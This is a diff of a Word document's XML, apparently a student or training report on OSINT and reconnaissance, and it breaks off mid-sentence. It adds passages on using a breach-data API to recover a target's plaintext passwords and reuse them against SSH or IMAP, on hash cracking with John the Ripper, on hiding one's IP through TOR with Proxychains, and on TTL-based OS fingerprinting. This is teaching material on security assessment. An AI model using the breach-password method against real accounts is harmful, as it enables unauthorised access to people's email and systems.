+        <w:t>phase</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">these </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">email addresses can then be checked </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">through </w:t>
+      </w:r>
+      <w:r>
+        <w:t>a known AP</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">I </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">known as BreachDirectory which </w:t>
+      </w:r>
+      <w:r>
+        <w:t>has the capabilit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ies</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">query </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">known data breach records </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">finding plain text </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">passwords which belong to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the target in addition to SHA-1 hashes, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">which can be stored </w:t>
+      </w:r>
+      <w:r>
+        <w:t>to</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> prove </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">password has been retrieved from data breach. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>To confirm the contents of the hash, a dictionary attack consisting of a wordlist would be required involving the use of tools such as John The Ripper.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Breach</w:t>
+      </w:r>
+      <w:r>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:t>irectory is available</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId15" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://rapidapi.com/rohan-patra/api/breachdirectory/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">and </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">is accessible </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">for free </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">with a limited number of requests. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Querying the API with a target email which is vulnerable will expose the password.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> This password can then be used in order to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">infiltrate </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">target </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">organisation via methods such as </w:t>
+      </w:r>
+      <w:r>
+        <w:t>password based SSH endpoints or IMAP</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">endpoints </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to </w:t>
+      </w:r>
+      <w:r>
+        <w:t>access target emails.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Conclusion</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">OSINT </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">and passive reconnaissance are </w:t>
+      </w:r>
+      <w:r>
+        <w:t>crucial first step</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> towards </w:t>
+      </w:r>
+      <w:r>
+        <w:t>infiltration</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> based attac</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ks</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> The process involves mapping the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> target organisation </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">together </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">so that </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">interesting </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">sources can be located in order to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">perform further </w:t>
+      </w:r>
+      <w:r>
+        <w:t>means of reconnaissance</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -3705,20 +4966,61 @@
         <w:t xml:space="preserve">passive reconnaissance has </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">been exhausted </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">and information has been gathered without interacting with the target, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">it is then time to move onto </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">performing </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">active recon. </w:t>
-      </w:r>
+        <w:t xml:space="preserve">been </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">fully </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">exhausted </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">and information has been gathered </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">from all avenues possible </w:t>
+      </w:r>
+      <w:r>
+        <w:t>without interacti</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">on </w:t>
+      </w:r>
+      <w:r>
+        <w:t>with the target</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t is then time to move onto</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the next phase </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">of information gathering </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">known as </w:t>
+      </w:r>
+      <w:r>
+        <w:t>active recon</w:t>
+      </w:r>
+      <w:r>
+        <w:t>naissance</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:t>Active reconnaissan</w:t>
       </w:r>
@@ -3732,24 +5034,60 @@
         <w:t xml:space="preserve">direct interaction </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">with the target where your </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">presence </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">can be detected by </w:t>
-      </w:r>
-      <w:r>
-        <w:t>target organisational defences.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>This</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> process </w:t>
+        <w:t>with the target</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">therefore you </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">run the risk </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">of </w:t>
+      </w:r>
+      <w:r>
+        <w:t>detect</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ion</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> by </w:t>
+      </w:r>
+      <w:r>
+        <w:t>target organisational defences</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> if you </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">perform </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">any suspicious </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">actions such as </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">repeated port scans </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">or brute forcing </w:t>
+      </w:r>
+      <w:r>
+        <w:t>SSH</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Active reconnaissance </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">involves </w:t>
@@ -3800,22 +5138,37 @@
         <w:t xml:space="preserve">to probe ports </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">and </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">attempt </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">connecting to </w:t>
+        <w:t>and</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> attempting to connect</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">these </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">ports </w:t>
       </w:r>
       <w:r>
-        <w:t>to query the target device</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> by grabbing the service banner. </w:t>
+        <w:t xml:space="preserve">to </w:t>
+      </w:r>
+      <w:r>
+        <w:t>grab</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>the service banner</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
         <w:t>This process is known as banner grabbing.</w:t>
@@ -3880,6 +5233,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:t>TOR</w:t>
@@ -3926,7 +5280,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3992,7 +5346,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4119,7 +5473,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId18"/>
                     <a:srcRect t="3869" b="29867"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -4160,7 +5514,7 @@
           <w:rPr>
             <w:noProof/>
           </w:rPr>
-          <w:t>6</w:t>
+          <w:t>8</w:t>
         </w:r>
       </w:fldSimple>
       <w:r>
@@ -4236,7 +5590,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4270,7 +5624,7 @@
           <w:rPr>
             <w:noProof/>
           </w:rPr>
-          <w:t>7</w:t>
+          <w:t>9</w:t>
         </w:r>
       </w:fldSimple>
       <w:r>
@@ -4414,7 +5768,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4436,10 +5790,204 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Proxychains can </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">be used to establish a browser session </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">which ties to a TOR exit node </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">IP address </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">protecting your </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">original </w:t>
+      </w:r>
+      <w:r>
+        <w:t>identity</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">To confirm our IP is correct, we can connect to </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId21" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://icanhazip.com</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">which </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">states the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">IP address </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">from the browser. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>This can be seen in the following figure.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4224E3CE" wp14:editId="1C4431ED">
+            <wp:extent cx="5619750" cy="1390650"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="14" name="Picture 14" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="14" name="Picture 14" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5619750" cy="1390650"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The IP address </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">is </w:t>
+      </w:r>
+      <w:r>
+        <w:t>associated to a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> TOR exit node </w:t>
+      </w:r>
+      <w:r>
+        <w:t>which can be confirmed by performing a DNS lookup</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">This means any traffic </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">traced back </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to ourselves </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">will </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">refer to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>exit node</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> rather than </w:t>
+      </w:r>
+      <w:r>
+        <w:t>your original IP address.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="346E3075" wp14:editId="0245D2B9">
+            <wp:extent cx="4019550" cy="428625"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="15" name="Picture 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4019550" cy="428625"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Ping</w:t>
       </w:r>
       <w:r>
@@ -4469,10 +6017,13 @@
         <w:t xml:space="preserve">of the operating system which is installed. </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">If we want to confirm the information retrieved from our passive recon is accurate, we can make use of </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the ping command </w:t>
+        <w:t>If we want to confirm the information retrieved from our passive recon is accurate, we can make use of</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ICMP packets</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">to </w:t>
@@ -4490,92 +6041,68 @@
         <w:t xml:space="preserve">the </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">TTL </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">packet. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">If the TTL packet is </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">around 64, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the target is using </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Linux,</w:t>
+        <w:t>TTL field (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Time To Live</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Although, sending the ping packet </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">could </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">come back with an </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">inaccurate value </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">due to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">packet </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">hop </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">in between your device and the target. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">A manual analysis can involve </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">simple arithmetic of </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">taking a base value of either 64/128/255 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">decreasing </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">this </w:t>
+      </w:r>
+      <w:r>
+        <w:t>from the traceroute value</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (number of hops)</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">if the target </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">value is around </w:t>
-      </w:r>
-      <w:r>
-        <w:t>12</w:t>
-      </w:r>
-      <w:r>
-        <w:t>8</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, the target is running Windows</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">; if the TTL value </w:t>
-      </w:r>
-      <w:r>
-        <w:t>is around 255, this is a network device.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Although, sending the ping packet </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">could </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">come back with an </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">inaccurate value </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">due to </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">packet </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">hop </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">in between your device and the target. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">A manual analysis can involve </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">simple arithmetic of </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">taking a base value of either 64/128/255 </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">decreasing </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">this </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">from the traceroute value </w:t>
-      </w:r>
-      <w:r>
         <w:t xml:space="preserve">to </w:t>
       </w:r>
       <w:r>
@@ -4585,7 +6112,190 @@
         <w:t xml:space="preserve">tempt working out </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">the type of operating system being used. </w:t>
+        <w:t>the type of operating system being used</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> by the target</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Table 1 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">shows the default TTL values </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">which correspond to the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">appropriate operating system. </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="4508"/>
+        <w:gridCol w:w="4508"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4508" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:t>TTL Value</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4508" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Operating System Type</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4508" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:t>64</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4508" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Linux</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4508" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:t>128</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4508" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Windows</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4508" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:t>255</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4508" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Networking Device (</w:t>
+            </w:r>
+            <w:r>
+              <w:t>Cisco</w:t>
+            </w:r>
+            <w:r>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Table </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t>: TTL values for specific OS types</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4638,7 +6348,13 @@
         <w:t xml:space="preserve"> based upon the TTL</w:t>
       </w:r>
       <w:r>
-        <w:t>, w</w:t>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>W</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">e can achieve this </w:t>
@@ -4650,1131 +6366,2251 @@
         <w:t>code in Appendix 1.</w:t>
       </w:r>
       <w:r>
-        <w:br w:type="page"/>
+        <w:t xml:space="preserve"> Automation </w:t>
+      </w:r>
+      <w:r>
+        <w:t>also helps</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> focus towards other processes </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">involved </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to perform reconnaissance whilst </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">scripts </w:t>
+      </w:r>
+      <w:r>
+        <w:t>run in the background</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> gathering </w:t>
+      </w:r>
+      <w:r>
